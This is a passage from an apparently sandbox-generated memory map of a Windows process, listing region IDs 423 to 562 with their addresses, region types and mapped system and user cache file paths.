"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 423 start_va = 0x1e70000 end_va = 0x1e70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 424 start_va = 0x1e80000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 425 start_va = 0x1ea0000 end_va = 0x1ea1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 426 start_va = 0x1eb0000 end_va = 0x1eb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 427 start_va = 0x1ec0000 end_va = 0x1ec1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 428 start_va = 0x1ed0000 end_va = 0x1ed1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 429 start_va = 0x1ee0000 end_va = 0x1f0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 430 start_va = 0x1f10000 end_va = 0x1f11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 431 start_va = 0x1f20000 end_va = 0x1f21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 432 start_va = 0x1f30000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 433 start_va = 0x1f40000 end_va = 0x2276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 434 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 435 start_va = 0x2300000 end_va = 0x2301fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 436 start_va = 0x2310000 end_va = 0x2357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 437 start_va = 0x2360000 end_va = 0x2360fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 438 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 439 start_va = 0x2380000 end_va = 0x245ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 440 start_va = 0x2460000 end_va = 0x2467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 441 start_va = 0x2470000 end_va = 0x2484fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 442 start_va = 0x2490000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 443 start_va = 0x24a0000 end_va = 0x24a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 444 start_va = 0x24b0000 end_va = 0x24b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{376D4583-7D39-4B0C-A26B-8169803AD7C6}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db") Region: id = 445 start_va = 0x24c0000 end_va = 0x24c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 446 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{28C2908A-A261-4BE8-AAA2-4843375011C5}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db") Region: id = 447 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 448 start_va = 0x24f0000 end_va = 0x255bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 449 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 450 start_va = 0x25e0000 end_va = 0x25e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 451 start_va = 0x25f0000 end_va = 0x25f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 452 start_va = 0x2600000 end_va = 0x26bbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 453 start_va = 0x26c0000 end_va = 0x26c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026c0000" filename = "" Region: id = 454 start_va = 0x26d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 455 start_va = 0x27d0000 end_va = 0x27d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 456 start_va = 0x27e0000 end_va = 0x27e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 457 start_va = 0x27f0000 end_va = 0x382ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 458 start_va = 0x3830000 end_va = 0x3830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 459 start_va = 0x3840000 end_va = 0x3840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 460 start_va = 0x3850000 end_va = 0x3850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 461 start_va = 0x3860000 end_va = 0x3861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003860000" filename = "" Region: id = 462 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 463 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 464 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 465 start_va = 0x3910000 end_va = 0x3910fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 466 start_va = 0x3920000 end_va = 0x3920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 467 start_va = 0x3930000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 468 start_va = 0x3a30000 end_va = 0x3a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 469 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a40000" filename = "" Region: id = 470 start_va = 0x3a50000 end_va = 0x3a5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a50000" filename = "" Region: id = 471 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a60000" filename = "" Region: id = 472 start_va = 0x3a70000 end_va = 0x3a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 473 start_va = 0x3a80000 end_va = 0x3a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 474 start_va = 0x3a90000 end_va = 0x3a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 475 start_va = 0x3aa0000 end_va = 0x3aa3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 476 start_va = 0x3ab0000 end_va = 0x3ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ab0000" filename = "" Region: id = 477 start_va = 0x3ac0000 end_va = 0x3ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ac0000" filename = "" Region: id = 478 start_va = 0x3ad0000 end_va = 0x3ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 479 start_va = 0x3ae0000 end_va = 0x3ae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ae0000" filename = "" Region: id = 480 start_va = 0x3af0000 end_va = 0x3b28fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003af0000" filename = "" Region: id = 481 start_va = 0x3b30000 end_va = 0x3b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 482 start_va = 0x3b40000 end_va = 0x3b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b40000" filename = "" Region: id = 483 start_va = 0x3b50000 end_va = 0x3b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 484 start_va = 0x3b60000 end_va = 0x3b63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 485 start_va = 0x3b70000 end_va = 0x3b71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 486 start_va = 0x3b80000 end_va = 0x3b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 487 start_va = 0x3b90000 end_va = 0x3b91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 488 start_va = 0x3ba0000 end_va = 0x3ba4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 489 start_va = 0x3bb0000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 490 start_va = 0x3bc0000 end_va = 0x3bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bc0000" filename = "" Region: id = 491 start_va = 0x3bd0000 end_va = 0x3bd3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 492 start_va = 0x3be0000 end_va = 0x3c24fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 493 start_va = 0x3c30000 end_va = 0x3c33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 494 start_va = 0x3c40000 end_va = 0x3ccdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 495 start_va = 0x3cd0000 end_va = 0x3ce0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 496 start_va = 0x3cf0000 end_va = 0x3cf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cf0000" filename = "" Region: id = 497 start_va = 0x3d00000 end_va = 0x3d17fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db") Region: id = 498 start_va = 0x3d50000 end_va = 0x3d51fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 499 start_va = 0x3d60000 end_va = 0x3d60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 500 start_va = 0x3d70000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 501 start_va = 0x3df0000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 502 start_va = 0x3e70000 end_va = 0x3e70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 503 start_va = 0x3e80000 end_va = 0x3e81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 504 start_va = 0x3e90000 end_va = 0x3e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 505 start_va = 0x3ea0000 end_va = 0x3ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 506 start_va = 0x3eb0000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 507 start_va = 0x3ec0000 end_va = 0x3ec1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 508 start_va = 0x3ef0000 end_va = 0x3ef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 509 start_va = 0x3f00000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 510 start_va = 0x3f80000 end_va = 0x4471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f80000" filename = "" Region: id = 511 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 512 start_va = 0x4580000 end_va = 0x4580fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 513 start_va = 0x4590000 end_va = 0x4596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 514 start_va = 0x45a0000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 515 start_va = 0x46a0000 end_va = 0x46a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 516 start_va = 0x46b0000 end_va = 0x46b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 517 start_va = 0x46c0000 end_va = 0x46c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 518 start_va = 0x46d0000 end_va = 0x46d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 519 start_va = 0x46e0000 end_va = 0x46e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046e0000" filename = "" Region: id = 520 start_va = 0x46f0000 end_va = 0x46f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046f0000" filename = "" Region: id = 521 start_va = 0x4700000 end_va = 0x4701fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 522 start_va = 0x4720000 end_va = 0x4721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 523 start_va = 0x4730000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 524 start_va = 0x4740000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 525 start_va = 0x4950000 end_va = 0x4950fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 526 start_va = 0x4960000 end_va = 0x4977fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000015.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000015.db") Region: id = 527 start_va = 0x4a60000 end_va = 0x4a61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a60000" filename = "" Region: id = 528 start_va = 0x4a80000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 529 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 530 start_va = 0x4b80000 end_va = 0x537ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 531 start_va = 0x5380000 end_va = 0x5380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 532 start_va = 0x5390000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 533 start_va = 0x5490000 end_va = 0x5491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005490000" filename = "" Region: id = 534 start_va = 0x5540000 end_va = 0x55bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 535 start_va = 0x55c0000 end_va = 0x55c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055c0000" filename = "" Region: id = 536 start_va = 0x55d0000 end_va = 0x55d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000055d0000" filename = "" Region: id = 537 start_va = 0x55f0000 end_va = 0x5638fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 538 start_va = 0x5640000 end_va = 0x5640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005640000" filename = "" Region: id = 539 start_va = 0x5650000 end_va = 0x5697fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005650000" filename = "" Region: id = 540 start_va = 0x5720000 end_va = 0x58d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 541 start_va = 0x58e0000 end_va = 0x59dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 542 start_va = 0x59e0000 end_va = 0x5a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059e0000" filename = "" Region: id = 543 start_va = 0x5a60000 end_va = 0x7de1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 544 start_va = 0x7e70000 end_va = 0x7eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e70000" filename = "" Region: id = 545 start_va = 0x7ef0000 end_va = 0x7f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ef0000" filename = "" Region: id = 546 start_va = 0x8050000 end_va = 0x8051fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 547 start_va = 0x8060000 end_va = 0x8061fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008060000" filename = "" Region: id = 548 start_va = 0x8070000 end_va = 0x816ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 549 start_va = 0x8170000 end_va = 0x826ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008170000" filename = "" Region: id = 550 start_va = 0x8270000 end_va = 0x8273fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 551 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 552 start_va = 0x8290000 end_va = 0x8291fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 553 start_va = 0x82a0000 end_va = 0x82a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082a0000" filename = "" Region: id = 554 start_va = 0x82b0000 end_va = 0x82b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082b0000" filename = "" Region: id = 555 start_va = 0x82c0000 end_va = 0x82c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082c0000" filename = "" Region: id = 556 start_va = 0x82e0000 end_va = 0x82e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082e0000" filename = "" Region: id = 557 start_va = 0x8310000 end_va = 0x842cfff monitored = 0 entry_point = 0x8311cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 558 start_va = 0x8430000 end_va = 0x852ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 559 start_va = 0x85e0000 end_va = 0x85effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085e0000" filename = "" Region: id = 560 start_va = 0x85f0000 end_va = 0x8777fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 561 start_va = 0x87f0000 end_va = 0x886ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 562 start_va = 0x88f0000 end_va = 0x896ffff monitored = 1 entry_point = 0x0 region_type = private name = 